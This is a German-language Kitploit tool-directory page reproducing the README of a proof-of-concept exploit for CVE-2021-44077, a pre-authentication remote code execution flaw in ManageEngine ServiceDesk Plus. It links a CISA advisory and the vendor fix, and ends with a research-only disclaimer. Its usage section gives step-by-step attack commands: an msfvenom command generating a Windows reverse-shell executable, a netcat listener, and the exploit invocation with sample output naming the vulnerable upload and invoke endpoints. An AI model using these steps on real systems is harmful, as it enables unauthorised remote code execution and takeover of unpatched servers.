Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44077 — Proof-of-Concept-Exploit für PreAuth-RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Lädt beliebige Windows-Executables hoch und führt sie auf verwundbaren Zielsystemen aus. | Kitploit
Tools/GitHubGitHub/horizon3ai/cve-2021-44077
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Proof-of-Concept-Exploit für PreAuth-RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Lädt beliebige Windows-Executables hoch und führt sie auf verwundbaren Zielsystemen aus.

Repository anzeigen
3692vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44077

Proof of Concept Exploit für CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Basiert auf:

  • https://xz.aliyun.com/t/10631

CISA Advisory:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Behebung (Update auf Build 11306 oder höher):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Getestet auf ManageEngine ServiceDesk Plus Build 11303. Alle AV deaktiviert.

Nutzung

Der Exploit lädt eine Windows ausführbare Datei auf das Ziel hoch und führt sie aus.

Um den Exploit durchzuführen, generieren Sie zunächst eine beliebige ausführbare Datei. Beispiel:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Führen Sie pip install für die Requirements-Datei aus, oder stellen Sie sicher, dass das requests-Paket installiert ist.

Wenn Sie eine Reverse Shell empfangen möchten, starten Sie zuerst Ihren Listener, z. B.

root@kitploit:~
nc -l 4444

Führen Sie dann das Exploit-Skript aus und übergeben Sie die Argumente url und exe, z. B.

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Beispielhafte Skriptausgabe:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

Hinweise zum Exploit

  • Die Schwachstelle ermöglicht es, eine beliebige Datei in das bin-Verzeichnis der Installation hochzuladen, einschließlich vorhandener Dateien wie Batch-Skripte. Es könnte andere Möglichkeiten geben, die hochgeladene Datei aufzurufen.
  • Das direkte Hochladen einer Webshell scheint durch einen Filter verhindert zu werden.

Haftungsausschluss

Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, sofern nicht ausdrücklich autorisiert. Die Projektverantwortlichen sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.

Tool herunterladen